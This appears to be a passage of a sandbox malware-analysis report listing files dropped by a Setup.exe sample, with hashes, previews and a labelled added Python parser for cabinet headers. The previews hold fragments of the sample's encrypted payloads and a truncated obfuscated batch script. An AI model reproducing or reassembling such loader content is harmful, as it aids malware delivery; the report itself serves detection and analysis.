Entropy (8bit): 4.161989199920853
Encrypted: false
SSDEEP: 24:nyGS9PvCA433C+sCNC1skNkvQfhSHQU2L55en:E9n9mTsCNvEQH5O5Un
MD5: 30F4E50E37A0D3E5FD948CAD2D9E8869
SHA1: CF90EE83E86761247D60AC3112973B6952FA1D45
SHA-256: 1A28498AA2E3A6E5257DF4E678E09FCD9FE095211471C28CBC1DA9CE10E6AD7E
SHA-512: FFC580FFE4AC2C409DB5D6828A6A5D445A78EEF342A840961CE4DD9DB60E18A6F484BE1B44A6F680429E32D490749F2348397FCACD828FA15BB1C9FADAB6080B
Malicious: false
Preview: Heater........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B..........................................................................................................................................................................................................................................................................

Process: C:\Windows\SysWOW64\extrac32.exe
File Type: data
Category: dropped
Size (bytes): 92160
Entropy (8bit): 6.658861449703547
Encrypted: false
SSDEEP: 1536:crKoUn9r5C03Eq30BcrTrhCX4aVmoJiKwtk2ukC5HRu+OoQjz7nts/M26N7oKzYR:XPnj0nEoXnmowS2u5hVOoQ7t8T6pUkBS
MD5: FAFB10877CC404606BF7F46DF49E09B2
SHA1: 8DF1827A09D787BF3356C55F9BD09571E9846782
SHA-256: B423CA1D48976AA11DED5B714443ADCE1BAC1AC88E68D3F8D3C1D546DCED8C2A
SHA-512: DE7B52E34BDC43DEA359227F71A53AF54E8E66566028FAC1517D4BEE59304341E3BBB25EC7BE26868DD785C513EE5C19C954E18C32737B6F2B80D10F066AA696
Malicious: false
Preview: .x..u.V...P.....V.Q.....h....j.S.P............M..........e...U..R.U.RQ.PH.........M.....w......U.R.u.Q.P..}.........E.P...Q...3.3..}.................E..U.!}.RV..P.Q..}.........E..U.RVP...Q..E.U.RP...Q..U.R..B0.E..E.P...QL.M..9}.vL.E.U.RWP...Q ..u4.E..U.R.u..P.Q8.E.U.Rj.P...QH.E.;E.E.P.........Q.G;}.r..E.P...Q..}.F;...D....}.........M..U.RQ...P..u.}..E..u.P......QL.}..uW.e...E.P.E.P..D.I...xA.u.M..4....u...<.I.j.h..I..M...H..P.M......E.P.u...H.I..M..m....M.Q...P.j..E.P.E.P............@_^[..3.G.}..Q..E.P...Q..E.E..+...U..Q.e..V..M.WQh..J.....@..V....u..u.V...P ....V.Q..%...M.Qh..J.V....u..u.j.V...P.....V.P..._^...U...p...SV..3.W.M.]....].....M..|....M..t...h iL..M..ku..V.M..g[..hDiL..M..Z[...M..-.....t$j\Xf9.t.f9G.t.hTiL..M...u..W.M..*[..9].tLj .E.SP.M.......]..E..M.P.d...h\iL..M...Z...E.S.u..E..E..u.P....I............E.Ph.....u...$.I.....ut.E.Ph....S.u..u.....I..=..I.....uM.E..E.....P......PSSS.u... .I.....u$.E.3..u...E.f..E..........P..@.I....u....u...M..a....M..Y...

Process: C:\Users\user\Desktop\Setup.exe
File Type: Microsoft Cabinet archive data, 488491 bytes, 11 files, at 0x2c +A "Brunette" +A "Consist", ID 8064, number 1, 29 datablocks, 0x1 compression
Category: dropped
Size (bytes): 488491
Entropy (8bit): 7.9985638740187595
Encrypted: true
SSDEEP: 12288:t6AeE6lWq91imJDqI6tPEB+F1ifKoxWr7BBq1Lam96enbyT+:UAeLUqiwN6mBisqdI1CwbyT+
MD5: C8ACBB75E41F0AC9B823198839006A5B
SHA1: 5E5145FAEAAED8059D6A2D9218B26972E6E012B8
SHA-256: 3E29497D7F1D6877C073933ACFADDBBC794EE1723E25EBEFE290BBC7BB34D671
SHA-512: 903B3C71D424FD7248C0775D058FE41D83E8E67941FB50FBA92F64D05BDF25A2C2D8B1DC93C071525D53D13F79F27AE0036A440E7E74B14B9BBBD5FB01100D97
Malicious: false
Preview: MSCF....+t......,...................5..................Y2. .Brunette............Y2. .Consist............Y2. .Immediately............Y2. .Luxury.. .........Y2. .Airplane..0.........Y2. .Sun..T.........Y2. .Earnings......$.....Y2. .Placing..'.........Y2. .Distinction.]..........Y2. .Lance..h..^......Y2. .Like....!.#..CK....[.y...8g"S..!-.(p....a..x..;Ig.twB.........$Ez:..7......z.8...!.q..R.8.8..q......C]....q2..C)......d..n...........$.V.....H.W...)Q.z..^..A.]...U....T.....U...E>.&..E.B.Qe..W.j..V..QT.D?.~.....hl.<:9.+..Ma+...v..W..sr...f....I,j.y.....L..6.Hl._.y.}.C..Y..}............B.O.>......:....S..W.v...>...Q......K.....z..^+u33{.s.L...Q.5m7..M{a..(.Y.5.&u,*.....)5H."#)....z...S.Z..^'.BX......Ar..>|..h...).....w....u.g.......&_..v.9.2..)..../.W..w..~.W.._....s.....V#......Q..jt?#q...J.!Z..q....1..B.y......JQ.%.!n....G..e.K....O..}....bH..l..3k.F"..t.ZO.Mj.cOc..u....k.b.V..gI.|.~;.p.;%....\.d...D{N...+...,...FYF..P...JT4.....!q4.#.1+.w".l.
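The File Type line of this record is libmagic's reading of the cabinet's directory tables: a 36-byte CFHEADER (cbCabinet = 488491, cFiles = 11, setID = 8064, iCabinet = 1), one 8-byte CFFOLDER (cCFData = 29 data blocks, typeCompress = 0x1, which is MSZIP) and the CFFILE entries that therefore begin at 0x24 + 8 = 0x2c; "+A" is the archive bit (0x20) in each entry's attribs field. Setup.exe writes this cabinet and the records whose Process is extrac32.exe are its expanded members, so listing the entries is the quickest way to tie the two sets of dropped files together. The parser below is an added example, not code from the report or from Joe Sandbox; it walks the tables without decompressing anything, flags inconsistencies that a tampered header would show (size, version, offsets, folder indices), and rebuilds a summary line in the same shape as the File Type field (libmagic-like, not libmagic itself). The cabinet it builds for testing is constructed: two entries named after the first two in the report, with sizes and timestamps chosen arbitrarily and no CFDATA body behind them.

```python
"""Walk the directory tables (CFHEADER, CFFOLDER, CFFILE) of a Microsoft Cabinet file.

Added example, not report or Joe Sandbox code. Header-only: CFDATA blocks are located
but never decompressed.
"""
import struct
from dataclasses import dataclass
from typing import List, Tuple

CFHDR_PREV_CABINET, CFHDR_NEXT_CABINET, CFHDR_RESERVE_PRESENT = 0x0001, 0x0002, 0x0004
ATTRIB_NAME_IS_UTF = 0x80
ATTRIB_LETTERS = ((0x01, "R"), (0x02, "H"), (0x04, "S"), (0x20, "A"), (0x40, "X"))  # 0x20 = archive
COMPRESSION = {0: "none", 1: "MSZIP", 2: "Quantum", 3: "LZX"}
HEADER_LEN = 36  # fixed CFHEADER, signature through iCabinet


@dataclass
class CabFolder:
    data_offset: int    # coffCabStart: first CFDATA block of this folder
    data_blocks: int    # cCFData
    compression: int    # low nibble of typeCompress


@dataclass
class CabEntry:
    name: str
    size: int           # cbFile, uncompressed
    folder_offset: int  # uoffFolderStart
    folder_index: int   # iFolder; 0xFFFD..0xFFFF mark entries spanning cabinets
    attribs: int

    def attrib_string(self) -> str:
        letters = "".join(ch for bit, ch in ATTRIB_LETTERS if self.attribs & bit)
        return "+" + letters if letters else ""


@dataclass
class CabInfo:
    cabinet_size: int
    first_file_offset: int
    set_id: int
    cabinet_index: int
    folders: List[CabFolder]
    files: List[CabEntry]
    warnings: List[str]


def _cstring(buf: bytes, off: int) -> Tuple[bytes, int]:
    end = buf.find(b"\0", off)
    if end < 0:
        raise ValueError(f"unterminated string at 0x{off:x}")
    return buf[off:end], end + 1


def parse_cab(buf: bytes) -> CabInfo:
    if len(buf) < HEADER_LEN or buf[:4] != b"MSCF":
        raise ValueError("missing MSCF signature")
    (cb_cabinet, coff_files, ver_minor, ver_major, c_folders, c_files,
     flags, set_id, i_cabinet) = struct.unpack_from("<4xI4xI4xBBHHHHH", buf, 4)
    warnings = []
    if (ver_major, ver_minor) != (1, 3):
        warnings.append(f"unexpected format version {ver_major}.{ver_minor}")
    if cb_cabinet != len(buf):
        warnings.append(f"cbCabinet says {cb_cabinet} bytes, buffer has {len(buf)}")
    off, folder_reserve = HEADER_LEN, 0
    if flags & CFHDR_RESERVE_PRESENT:  # optional per-structure reserve sizes
        header_reserve, folder_reserve, _data_reserve = struct.unpack_from("<HBB", buf, off)
        off += 4 + header_reserve
    for flag in (CFHDR_PREV_CABINET, CFHDR_NEXT_CABINET):
        if flags & flag:  # szCabinetPrev/szDiskPrev, then szCabinetNext/szDiskNext
            _, off = _cstring(buf, off)
            _, off = _cstring(buf, off)
    folders = []
    for _ in range(c_folders):
        start, blocks, type_compress = struct.unpack_from("<IHH", buf, off)
        if start > len(buf):
            warnings.append(f"folder data offset 0x{start:x} lies outside the file")
        folders.append(CabFolder(start, blocks, type_compress & 0x000F))
        off += 8 + folder_reserve
    if coff_files != off:
        warnings.append(f"coffFiles 0x{coff_files:x} does not follow the folder table (0x{off:x})")
    files, off = [], coff_files
    for _ in range(c_files):
        size, folder_off, i_folder, _date, _time, attribs = struct.unpack_from("<IIHHHH", buf, off)
        raw, off = _cstring(buf, off + 16)
        name = raw.decode("utf-8" if attribs & ATTRIB_NAME_IS_UTF else "cp1252", errors="replace")
        if i_folder < 0xFFFD and i_folder >= c_folders:
            warnings.append(f"{name!r} references folder {i_folder} of {c_folders}")
        files.append(CabEntry(name, size, folder_off, i_folder, attribs))
    return CabInfo(cb_cabinet, coff_files, set_id, i_cabinet, folders, files, warnings)


def summarize(info: CabInfo) -> str:
    """One line in the shape of the File Type field above (libmagic-like, not libmagic)."""
    names = " ".join(f'{f.attrib_string()} "{f.name}"' for f in info.files[:2])
    folder = info.folders[0] if info.folders else CabFolder(0, 0, 0)
    return (f"Microsoft Cabinet archive data, {info.cabinet_size} bytes, {len(info.files)} files, "
            f"at 0x{info.first_file_offset:x} {names}, ID {info.set_id}, number {info.cabinet_index}, "
            f"{folder.data_blocks} datablocks, 0x{folder.compression:x} compression")


def build_sample_cab() -> bytes:
    """Constructed cabinet: one MSZIP folder, two archive-flagged entries, no CFDATA body."""
    entries = ((b"Brunette", 3021), (b"Consist", 4410))  # names from the report, sizes arbitrary
    file_table, uoff = b"", 0
    for name, size in entries:
        file_table += struct.pack("<IIHHHH", size, uoff, 0, 0x3259, 0x0000, 0x20) + name + b"\0"
        uoff += size
    coff_files = HEADER_LEN + 8                  # one 8-byte CFFOLDER right after the header
    coff_data = coff_files + len(file_table)     # where CFDATA would begin; also the total size here
    folder = struct.pack("<IHH", coff_data, 29, 1)  # 29 data blocks, typeCompress 1 = MSZIP
    header = b"MSCF" + struct.pack("<IIIIIBBHHHHH", 0, coff_data, 0, coff_files, 0,
                                   3, 1, 1, len(entries), 0, 8064, 1)
    return header + folder + file_table
```

On a real dropped cabinet, run parse_cab over the whole file and compare the entry names and cbFile values against the sizes of the files extrac32.exe wrote; any warning in info.warnings (a cbCabinet that disagrees with the file size, a folder index past the table) means the header was edited by hand or the file is truncated, and an off-the-shelf extractor may still happily unpack it.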

Process: C:\Windows\SysWOW64\extrac32.exe
File Type: data
Category: dropped
Size (bytes): 125952
Entropy (8bit): 6.649590989057659
Encrypted: false
SSDEEP: 3072:s80PtCZEMnVIPPBxT/sZydTmRxlHS3NxrHSBRt9:RSCOMVIPPL/sZ7HS3zc9
MD5: 0B8BEFA0353A182791FD6940040A9D59
SHA1: 969AD9C6DDD6EB46DA51CE990B552D5E48D9773F
SHA-256: 397EA5D9A9A70181A6A334FB298B8F4BC2C62802E730CD905E9D7E9A2D6D76D2
SHA-512: 26B321360220180D515ED9BEB67F3BB9DE704423E0DED283039A86E344C4E84DE71341A402E331ED4ECA4233400FD207BF5F6A67BF3603A1E4706AB96B605215
Malicious: false
Preview: .....D$..T$..D$...}.G.T$........D$..T$...u(.L$..D$.3....D$.......d$.....d$....G..L$..T$..D$...........u.....d$...D$.....r.;T$.w.r.;D$.v.N+D$..T$.3.+D$..T$.My.............Ou.......]^_....WVS3..D$...}.G.T$........D$..T$..D$...}.G.T$........D$..T$...u..L$..D$.3....D$.....A..L$..T$..D$...........u.....d$...D$.....r.;T$.w.r.;D$.v.N3..Ou.......[^_.........Q.L$.+.....#..%....;..r...Y.....$..-...........SW3..D$...}.G.T$........D$..T$..D$...}..T$........D$..T$...u..L$..D$.3...D$....3.OyN.S..L$..T$..D$...........u.....d$...d$...r.;T$.w.r.;D$.v.+D$..T$.+D$..T$.Oy......._[.................Q.L$.+.........Y.....Q.L$.+.........Y.........=4.M..t7U.........$..,.$..=4.M..t.....<$Xf...f...t..$.....I.U... ......T$..|$..l$..T$..D$...t<...y...$..$................T$.....,..$..$..........T$.......T$.......u..\$..\$..............U..W.=4.M.........}.ww..U........f.n...p.........#.....+.3...o.f...f.t.f.t.f...#.u.f...#........E........Sf...#...3.+.#.I#.[.......D._....

Process: C:\Users\user\Desktop\Setup.exe
File Type: data
Category: dropped
Size (bytes): 89088
Entropy (8bit): 7.99817329569546
Encrypted: true
SSDEEP: 1536:X3TeA/W3VLk0p5GkCKbOnVFBTn2Zp9h/OmcWcs5WIx6ZXQHWUFxgbtIKGHCGc9r:XDoQ0p5GBKbOnnBa5h/Om+/GmAqtIxw
MD5: 7946371D81CDBB48F44BF84C2920119E
SHA1: 3E2DC295C34E27ADEB0BF1D77D5AF673060B1BB5
SHA-256: 47DD408466A30EF6B55F197F69871F13CEBF32473DBE7D570F5C7988521837F9
SHA-512: 72009940E254E2981014C1A8EB1198417B7E80C027D146E8C0D47D18631EC83C5687B724CA4249525339BC33629493FEC7AD31D2A9B766C35819A46EC7B37E33
Malicious: false
Preview: ...:.J.8.QA..E..C."...|Y..X...,...C..p......:C....~v.%.E.|.a{.9.W/......0...^.Wu.......y....i.....h....u.tx...$E..C._...^.......7V=B.U...?8.R..U....).^.."^..o...g...86.;..K|.Y...P......J.2S`!.>.q....}...v..{..U...\..Y.....P..#..."..-.%..i.Ed..>UB.,U....8....O`.M.........,.*\.z.....r.....^...bV7f.bS..-.%.....h..L."|....6<..b=.$f..;?;..L.S.j..E......o.=....tU[._.....-/.|-p[o.f&..|......#....E5a|n.(.V..B3....4.O....d..Wu.Ne.:t .!.'.3..Kyh%....,)n.n.h.c....F....+(W.....W.V..t....=..qI]RJ+o\!.J.....PV8..... .M235.yl.......E.5G...........`OO2w.<)...Q......t&......u.s..X..SU..eI-:...c:.%L\...M..V".vE].X.%.v3.k....k.....'?"..]>.K.Z.....5>.~.5.......k(..6v5.3.8..f...oC.y....N?....z2.P..^l.;Faij|5|.:...Q..D'..Z.....4.KC...n..Z...\:Y5....ub]h..@..J.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....
Process:C:\Users\user\Desktop\Setup.exe
File Type:ASCII text, with very long lines (723), with CRLF line terminators
Category:dropped
Size (bytes):16091
Entropy (8bit):5.134979352547264
Encrypted:false
SSDEEP:384:CU+mtTlwtTHvdBbcnm39/xaaU/7aN7v2GakGz:CUlt8HvdpLt/xaaUja73akGz
MD5:4EC2F189783F4FF069C71D242E25446C
SHA1:108A21C6E21824A06DEB73F8F34F3B58929E3DFF
SHA-256:CD80EE277AAF845BB84E6F78C7E7845C4F119E32ED293ADC235C7BF83A160F30
SHA-512:69D814791C8E1DCD75EE7E2901691E0982630325B8C06734D056BDF99607794CD9C217F269CADA883F6F2238F34A0250D5E5C3A22B7C75C813B6530E7193B4EE
Malicious:false
Preview:Set Naturally=j..MCVConsists-..SymwBass-Bicycle-Llc-Came-Farmer-Hispanic-Dispatch-Files-Rip-..AxACircumstances-Him-..HruClassifieds-Downloading-Caps-Powered-Defendant-Nirvana-..GEProcedure-Headers-Individual-Anytime-Disney-Plastics-Area-..WQUmDemo-Characteristics-Habits-..Set Produces=p..YAgReduction-..ZaOPeterson-Guitars-Ronald-Minneapolis-Chemical-..nudDBarn-Racks-Poor-Happened-Ab-..CVwcBehaviour-Chancellor-Neil-Highlight-Ensuring-Worker-..BZReplies-Educators-Vietnam-Ranch-Beaver-..EGRanging-Running-Dedicated-Advantages-Temple-Science-Notes-..MAvRelocation-Bookmark-Assessment-Ethiopia-..YMEBdsm-Screensaver-Mumbai-Assistance-Facing-..LJVWare-Ebay-Frontier-Pre-Smithsonian-Stickers-Cancelled-Public-..Set Quickly=K..qtStadium-Somewhat-Acquisitions-Legacy-Infants-Seeds-Bottles-..iZXYVerification-Af-Bc-Upskirts-Documented-Normally-Collectibles-Ta-Simulations-..IOgsOuter-Abuse-Rn-Use-Fur-Great-..OANDna-Overhead-Hispanic-Directors-Culture-Morgan-Constitute-Azerbaijan-..cvStock-Hall-Transcrip

Process:C:\Windows\SysWOW64\cmd.exe
File Type:ASCII text, with very long lines (723), with CRLF line terminators
Category:dropped
Size (bytes):16091
Entropy (8bit):5.134979352547264
Encrypted:false
SSDEEP:384:CU+mtTlwtTHvdBbcnm39/xaaU/7aN7v2GakGz:CUlt8HvdpLt/xaaUja73akGz
MD5:4EC2F189783F4FF069C71D242E25446C
SHA1:108A21C6E21824A06DEB73F8F34F3B58929E3DFF
SHA-256:CD80EE277AAF845BB84E6F78C7E7845C4F119E32ED293ADC235C7BF83A160F30
SHA-512:69D814791C8E1DCD75EE7E2901691E0982630325B8C06734D056BDF99607794CD9C217F269CADA883F6F2238F34A0250D5E5C3A22B7C75C813B6530E7193B4EE
Malicious:false
Preview:Set Naturally=j..MCVConsists-..SymwBass-Bicycle-Llc-Came-Farmer-Hispanic-Dispatch-Files-Rip-..AxACircumstances-Him-..HruClassifieds-Downloading-Caps-Powered-Defendant-Nirvana-..GEProcedure-Headers-Individual-Anytime-Disney-Plastics-Area-..WQUmDemo-Characteristics-Habits-..Set Produces=p..YAgReduction-..ZaOPeterson-Guitars-Ronald-Minneapolis-Chemical-..nudDBarn-Racks-Poor-Happened-Ab-..CVwcBehaviour-Chancellor-Neil-Highlight-Ensuring-Worker-..BZReplies-Educators-Vietnam-Ranch-Beaver-..EGRanging-Running-Dedicated-Advantages-Temple-Science-Notes-..MAvRelocation-Bookmark-Assessment-Ethiopia-..YMEBdsm-Screensaver-Mumbai-Assistance-Facing-..LJVWare-Ebay-Frontier-Pre-Smithsonian-Stickers-Cancelled-Public-..Set Quickly=K..qtStadium-Somewhat-Acquisitions-Legacy-Infants-Seeds-Bottles-..iZXYVerification-Af-Bc-Upskirts-Documented-Normally-Collectibles-Ta-Simulations-..IOgsOuter-Abuse-Rn-Use-Fur-Great-..OANDna-Overhead-Hispanic-Directors-Culture-Morgan-Constitute-Azerbaijan-..cvStock-Hall-Transcrip

Process:C:\Windows\SysWOW64\extrac32.exe
File Type:data
Category:dropped
Size (bytes):113664
Entropy (8bit):5.9757532889739595
Encrypted:false
SSDEEP:3072:iy4Za9coRC2jfTq8QLeAg0Fuz08XvBNbjaAts9:34ZgP0JaAOz04phdy9
MD5:B4619D92F2F73914156B195399C4547E
SHA1:1824EC15ACED65DE39436EA92F8896E760C56BAE
SHA-256:8FA8CC2B893E39889F6AE206F02CCCA9E472B41580A7454C541D22C347FCB1AC
SHA-512:E1E8D5DFE9D6686370573739F9BC5B1C5BE49DA7E85A3FF2B7E8D7E6029645EFB23E60A4EBE6373343B5C5CA9D1F965E5141352B4B90FAA684F07D02FA75668A
Malicious:false
Preview:....0.F...t.9..)M.u....)M...F.P..<.I..f...}..t#.u..u...@.I..F...4.I.9.u..L)M...)M.^]...U..}..t..u...(M........L)M.....L)M....u.3..-.@)M.......E..AX.E..A\.E...~..A`.E...~..Ad3.@]...U..}..t..u...(M..{......L)M.....L)M....t$.@)M.j.j.j ......E..1.A..E..A.....I.]...U..}..t..u...(M..(......L)M.....L)M....u.3..h.@)M..E.....L.V.....0....D{....L..8....F|....E....t........E....t........Nl;M.t..u...7...E.......3.@^]...U..Q.}..t..u...(M.......L)M.....L)M.VW..........@)M.j.....0..P.E...\.I..}......#.+.....@.E....t.Wj..u...@.I...tb.}..t..u.j..u...@.I...tJ.~8.t?.....3.#.;....9E.t.j.;.u...L.I..FH....L.I.)FHjG3.PPPPP.u.....I.3.@..3._^....U..Q..L)M.V...t..@)M.......0..3..u...(M.....E....tZ.}...L)M.tK.E.P.E.P.u...9....t;.M..@)M.....M....T)M.............u........................3.^....U... W.}...9.ul..:.uf.E.P.E..0....I..E.E.E.E..E.P.7..x.I..E.E.E..E.E.E.E..E..E.P.7..x.I..E..u..E.E..E..E.P.7..X.I._....U..].9..U.....E.SVWP.E.P.u..)8......)....M..@)M..].....M..0.T)M.....8.......E

Process:C:\Users\user\Desktop\Setup.exe
File Type:data
Category:dropped
Size (bytes):95232
Entropy (8bit):7.997830456340322
Encrypted:true
SSDEEP:1536:Co7r/NIc6N+BeIVeWzx2MpTbtnxLCFoAdZW2UbaZU2NipP6LIBvZik6WPf2F90IU:dBIf8BeseW/TFj27ZU+I1ZiRWPf2M
MD5:153CFF0DDF850447E2B40CE0FDFA95FA
SHA1:854190DFB1E2EB761DB65430F9C36B56B18E1353
SHA-256:70E39C54C3CAFB4E8F5A8586DE0A640AB71C876F1C7F097A763616AD9CA777DD
SHA-512:CF6D7CA2498BCCBC89A5CDCB4ED7505C8844CB5A363A6F6408EA66F0FA11031B1374BA27F9A705EB05901350D01A1C74B7FA30E26128576DF37B9BE1F8E1BAF7
Malicious:false
Preview:i.)m{....QC......I..a5.M.=Bje `.....l.!.L?....)[......-%..o..D.9.k.m'..#z...A.EZ.k.Gf.P.Y#m......PV*..P.Q....W..X..-k........^.S.#....i..5.;..........b).......X.u81p..D^].|.....C!|......ilL.7uX1.1{-X7.g.....e_or..[..n/...k.....+2..F..@..;....MY./7..V$..e.....{^.Y.4.H..f!^....A&.}s.=x..._..=...-.5>.L..(.Y..nf.V.R..bm .C%..#..^..T+}.xOV....!...Y ...\^x.O....m.".;......d...H.j..e...^h....{..7;@..{j......y..Kc.....P&&....I./..i.``n..tCp?..id.O.l..e>.(.%..q../7P...._E...sS.i...S..g.D.o.|.*..DEKj....u1..S.>........h"...W.T...`p.....t......o.R.%\..gX..v^.../#*.!.d.]s...QQb......."...xn1.Xe..X.r......Cy...4..H.\..;.t..T~...2...T f.....d.)..ga...q....G..0tv.1f......2.E.......mW_.7!.....".l>.]A...f.U.o....66.!.g^....<R..~e=H.<[..^...le.W.$..q8..E.iKBQ...`..0.....l.O.fD0D.5K..u|....*.A.......R.[..jUy.yIz..R..A.Y.....XT~0.c...s...R.%../...1.J.I...ww...U......X..I.P.w....@..f...$.v.I.....@..Yz...~t..e.......&....R{;.8n....^E.y..9...L.....

Process:C:\Users\user\Desktop\Setup.exe
File Type:data
Category:dropped
Size (bytes):21161
Entropy (8bit):7.991486692843784
Encrypted:true
SSDEEP:384:3XyXacewvF8s/4klZtRZeCu6fiGtjAJxZ5Hw+6/77sikKpieKGR1Y3PQ6oH5U:Ebewz/9tDeCHLBAHZlzM7Dk95GR1+Ge
MD5:17A5BD6837570221A729E238016987E8
SHA1:C554EE923215069541B7EFEA6B437F536D85ACBA
SHA-256:04773C3E15CE4D3371AD1A6613222E22B008A7FB9B6CBE4F69B3D3426C79E94F
SHA-512:255B66D9AF6FDF2D97FEF1BDB6AC956BB3C2B3235E35C7A1988CAAD444511857CFEFCAAEE0F7D8DAECC72BB5BF837C6BAE18489711F4BA68AE2265E5CB8D33DF
Malicious:false
Preview:.;{>\...8.5Ub.nn......e<..HV3:.....g.)....'O.... .:M.......hrnJ...~u......K...W.....Y.:.`.#.F5.J.bx.^w..h.|......cj.....*G.Z[.ln.j.....5.d...!'..5....\...dJ8..q...._.*..A.~....q.JI...G..o~xKy|...K#`.h..qx!..I.g.<....]...}d.....]..V].PE.~.a.r.9P.AA..*..\..)>..Y]s..i...;..R...sV.A....N.El..u..t.\.*8-)..pK.f.R.[.2..+iq.L.7.|[..W~L9.@.+...H....'.m..i.N.1.......4.........!.....u.T......y......u......\G....k.L...dD..Qy.M...].KK<%.........k.`$.......Z!}..~x..(..h.....y.W."0(..I.....v.C....O.<3./kC..=........jCJ!.9...@.......J.XP7.pX._QC.:._C.(.h5nzREd.l..u..'.xd.B...7...d...l...\...YT...\...%q!..>S/#B.....B&>.{.T5...a<W.65S.w.|.sG(.<^..8.mZ... ......3.....%...:.w.P.i7./...S'A.DNPS.....DPu.8..};4j........lM.Q..U.g......O@...&.......64C.e.5.....N..L.dV........pn.A.td.6..#'...o.2...8..m......#l..D..+..8...\H.A...^..E./h...s..Z ........P.2...`^..^.l...68..W..Y.T\.....l/...WV.s$......?....6z.....+_..eU....^.....D.Bd/..h...MM.aM.I....

Process:C:\Users\user\Desktop\Setup.exe
File Type:data
Category:dropped
Size (bytes):62464
Entropy (8bit):7.996797481108441
Encrypted:true
SSDEEP:1536:bp8MJGsjsYGsE3WfmQmBZFs788hNd754qsj8vA:bpPJRsYGsE3WliZYdhNF5nS9
MD5:CDE9634CC5B348EE7B071CB62BEAA3CE
SHA1:6EAEC4F48F2F19E409216DE02F8814238B3925EE
SHA-256:E034C077B8F9D4F767FC51FAB721D147053E2EF572614E2CC8501C9F06DD0493
SHA-512:424C0A474E8480826096836C05461B7A20C67A528D13F192F2A1CB4DA572072381C711FC2772816811655BFE6D6108447964A6C114022847E8E4BAD8D8AD8AC3
Malicious:false
Preview:];i.6.\.n......H..~.C..pv.\.p&y..w...'...6..K:.A.r..........v.?X.C...?3(U^..A......w'.?.~...f.-{..(.........S...J.|.....l..V=.p.Op..N..u..I........T....|L.a......s.....P.}k....\.._.u[J".u.Bw.)08.k!t6.c!bE.}.'.#.k..[..`gG.L....1$.&...=..9z...#..cw.3...Fx2.S..z..(....c....9..V...MZ@.).,F.(....F$...v.......:.....Bz.!Yq.=..2...zq.4J(d."lH...v[.~.8f.B.K......1..A.._.L^/....sr).ew......P...8.s.Ivz.&D..2~......EA...=JR..5.GQe.,.67... J:...t..D..|U.G..'.....$.IA......E....np..q.$..o4.qF~?W.6X...........6.....o.e..."4.....c..........,^{oR.a.+.....v".wVB...b..w|X......#r_...=.'........4p.V.t..............."q..#........{..>.*.h(.=kjl..'.+...f.Pg..D.5wx...?..".3"....V..A(..9.$=g.....n;......K....1..U._.#.q.....Y7.tdT.p'...y.3..@.EY.p...Hy;.;.2..j._>..9p.3......gY1$/...L...zv(.E.Nr_.....7.O?yA.......`.S..$...l...R...b..m?.(....r..$...m..x5....V..Bd..&d.5...{..\o...0uy../..Rj6lU.[Of..^.,.L.@J..%...B...?.....CC..K.]...W.3.....<Y..d.../[Et.4lbU.P.

Process:C:\Windows\SysWOW64\extrac32.exe
File Type:data
Category:dropped
Size (bytes):77824
Entropy (8bit):5.064020555279566
Encrypted:false
SSDEEP:384:CQXoSpu88888888888888888888888888888zv888888NfU84444Qnoooooooook:Vx/SGKAGWRqA60dTcR4qYG
MD5:A0AD27D13A6EE64C6B56CDBCCCD46357
SHA1:1DFB105A7A253FFABEB313756A660027EFBD87FC
SHA-256:1C285FCAF12CCAA31A673FF30642234F785C617B478C2FC0D4382DF04B8A0E4D
SHA-512:07D28B6571E67DFAC14A3A4FC64691C5DBD1907E7691E2ACF3C48F25DD7B9AA210438C661430A49CCEF816FC64BDE519C1E03B7873ECF1E8E8048103CFBB7AC9
Malicious:false
Preview:.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.r.(.(.(.(.(.(.(.(.*.(.(.(.(.(.(.r.(.(.).).).).).........).).r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1.1.2.2.2.2.3.2.2.2.2.2.2.1.2.2.3.3.2.2.0.4.4.4.4.4.4.4.4.4.4.5.5.5.5.5.5.0.0.0.0.0.0.3.3.2.2.0.0.0.0.2.2.2.0.1.1.1.0.0.1.1.1.1.1.1.1.0.0.0.2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.1.3.2.2.1.1.1.1.1.1.2.0.1.4.4.4.4.4.4.4.4.4.4.1.1.1.2.6.6.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.r.7.r.r.r.r.r.7.r.r.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8...9.8.8.8.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
